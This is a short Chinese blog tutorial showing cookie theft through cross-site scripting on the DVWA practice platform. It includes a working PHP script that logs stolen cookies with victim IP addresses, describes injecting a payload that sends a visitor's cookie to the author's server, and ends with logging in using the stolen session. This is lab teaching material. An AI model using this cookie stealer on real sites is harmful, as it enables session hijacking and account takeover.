XSS获取Cookie过程简单演示

XSS:

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

本次演示将通过DVWA平台进行

实例:

打开DVWA的XSS测试模块

这里写图片描述

提交测试能否弹窗

这里写图片描述

没问题 用alert(document.cookie)弹出用户的cookie

这里写图片描述

好的获取到Cookie了文章结束 -:)
/手动滑稽 那么我们怎么才能将获取到的cookie传到自己服务器上来呢

这儿我们要写一段php代码来获取对应的cookie及ip并生成一个cookie.txt的文件来保存得到的cookie

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>   

我们将php文件放到服务器的web目录下
然后访问一下localhost/getcookie.php?cookie=111测试一下php代码
这里写图片描述
可以看到确实有了访问记录

构造XSS语句将网页插入到里面

这里写图片描述

此处DVWA对Message框做了长度要求 通过HTML改大即可

切换一台虚拟机登录这个页面后该用户的cookie就会自动保存到我的cookie.txt下面

这里写图片描述

接下来就可以直接用他的cookie进行登录了~
  • 6
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值